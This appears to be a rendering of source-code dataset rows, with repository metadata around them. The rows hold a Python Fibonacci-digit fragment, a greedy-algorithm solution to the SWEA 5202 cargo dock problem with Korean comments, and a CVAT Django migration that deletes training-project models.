if __name__=="__main__":
print fib_digits(100000)
| [
"b.travis.howe@gmail.com"
] | b.travis.howe@gmail.com |
c288c47b0ee58b847eafd53a54b97c0dbe7b513b | 52cb25dca22292fce4d3907cc370098d7a57fcc2 | /SWEA/5202_화물 도크.py | b568642b10f3da83d05c58573e217c3b11c3bb77 | [] | no_license | shjang1013/Algorithm | c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a | 33f2caa6339afc6fc53ea872691145effbce0309 | refs/heads/master | 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | # 문제
# SWEA 5202 - [파이썬 S/W 문제해결 구현 3일차] 탐욕 알고리즘 - 화물 도크
# 나의 코드
T = int(input())
for tc in range(T):
N = int(input())
time = []
Lorry = []
for i in range(N):
time.append(list(map(int, input().split())))
time.sort(key = lambda i:i[1])
Lorry.append(time[0])
for k in range(N):
if Lorry[-1][1] <= time[k][0]:
Lorry.append(time[k])
i += 1
print("#%d %d" %(tc+1, len(Lorry)))
| [
"shjang113@gmail.com"
] | shjang113@gmail.com |
b37de288b6b30b48e14d7fb169d4d8fe6c4bbccd | dac12c9178b13d60f401c4febff5569af8aa2719 | /cvat/apps/engine/migrations/0050_auto_20220211_1425.py | 67322fca1254fb9f2986368a567e10d4f4876a05 | [
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later"
] | permissive | opencv/cvat | 39dc66ca20f972ba40b79c44d7ce43590dc0b0b5 | 899c9fd75146744def061efd7ab1b1c6c9f6942f | refs/heads/develop | 2023-08-19T04:27:56.974498 | 2023-08-18T09:58:25 | 2023-08-18T09:58:25 | 139,156,354 | 6,558 | 1,887 | MIT | 2023-09-14T12:44:39 | 2018-06-29T14:02:45 | TypeScript | UTF-8 | Python | false | false | 822 | py | # Generated by Django 3.2.12 on 2022-02-11 14:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('engine', '0049_auto_20220202_0710'),
]
operations = [
migrations.RemoveField(
model_name='trainingprojectimage',
name='task',
),
migrations.RemoveField(
model_name='trainingprojectlabel',
name='cvat_label',
),
migrations.RemoveField(
model_name='project',
name='training_project',
),
migrations.DeleteModel(
name='TrainingProject',
),
migrations.DeleteModel(
name='TrainingProjectImage',
),
migrations.DeleteModel(
name='TrainingProjectLabel',
),
]
| [
"noreply@github.com"
] | opencv.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.